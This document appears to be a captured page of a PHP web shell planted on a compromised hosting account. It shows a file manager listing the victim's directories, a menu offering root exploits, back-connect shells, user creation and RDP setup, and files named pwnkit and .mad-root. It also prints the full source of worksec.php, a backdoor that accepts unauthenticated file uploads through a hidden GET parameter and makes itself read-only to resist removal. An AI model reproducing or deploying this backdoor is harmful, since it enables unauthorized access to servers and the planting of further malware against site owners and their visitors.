Linux webm002.cluster120.gra.hosting.ovh.net 6.18.42-ovh-vps-grsec-zfs+ #1 SMP PREEMPT_DYNAMIC Wed Aug 5 15:59:48 CEST 2026 x86_64
Apache
: 10.120.20.2 | : 216.73.216.49
Cant Read [ /etc/named.conf ]
8.5.7
verseaumee
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
home /
verseaumee /
[ HOME SHELL ]
Name
Size
Permission
Action
123click
[ DIR ]
drwx---r-x
TF89388
[ DIR ]
drwx---r-x
blueversion
[ DIR ]
dr-xr-xr-x
blueversionx
[ DIR ]
drwxr-xr-x
chatblueversion
[ DIR ]
drwx---r-x
colorkeysstudio
[ DIR ]
drwx---r-x
empowernetkenyajuly2026
[ DIR ]
drwx---r-x
genieprevention
[ DIR ]
dr-xr-xr-x
geniouskin
[ DIR ]
drwx---r-x
josholurinfr
[ DIR ]
drwx---r-x
lauvia
[ DIR ]
drwx---r-x
login
[ DIR ]
drwx---r-x
maze
[ DIR ]
drwx---r-x
middletvnew
[ DIR ]
drwx---r-x
middletvnew26
[ DIR ]
drwx---r-x
pickapp
[ DIR ]
drwx---r-x
ptitsanes
[ DIR ]
drwxr-xr-x
quaadraa
[ DIR ]
drwx---r-x
royalkarukera
[ DIR ]
drwxr-xr-x
ssl
[ DIR ]
drwxr-xr-x
www
[ DIR ]
dr-xr-xr-x
zenit
[ DIR ]
dr-xr-xr-x
.bash_logout
24
B
-rw-r--r--
.bash_profile
236
B
-rw-r--r--
.bashrc
131
B
-rw-r--r--
.mad-root
0
B
-rw-r--r--
.ovhconfig
110
B
-rw-r--r--
adminer.php
0
B
-rw-r--r--
pwnkit
0
B
-rwxr-xr-x
worksec.php
1.33
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : worksec.php
<?php error_reporting(0); if(isset($_GET['GXWFE'])){ echo "<form method='POST' enctype='multipart/form-data'><input type='file' name='file' /> <input type='submit' value='upload' /></form>"; move_uploaded_file($_FILES['file']['tmp_name'], $_FILES['file']['name']); exit(0); } ?> <?php // Path to the file $file = 'worksec.php'; // Change the file permissions to 0444 (read-only) chmod($file, 0444); ?> <?php error_reporting(0); set_time_limit(0); $user = get_current_user(); echo "<center><b>Uname:".php_uname()."<br></b>"; echo "<br><b>Base Dir : ".getcwd()."<br></b>"; echo "<br><b>User : ".$user."<br></b>"; echo '<br><font color="black" size="4">'; if(isset($_POST['Submit'])){ $filedir = ""; $maxfile = '2000000'; $mode = '0644'; $userfile_name = $_FILES['image']['name']; $userfile_tmp = $_FILES['image']['tmp_name']; if(isset($_FILES['image']['name'])) { $qx = $filedir.$userfile_name; @move_uploaded_file($userfile_tmp, $qx); @chmod ($qx, octdec($mode)); echo" <a href=$userfile_name><center><b>Sucessfully Uploaded :D ==> $userfile_name</b></center></a>"; } }else{ echo'<form method="POST" action="#" enctype="multipart/form-data"><input type="file" name="image"><br><input type="Submit" name="Submit" value="Upload"></form>'; } echo '</center></font>'; ?>
Close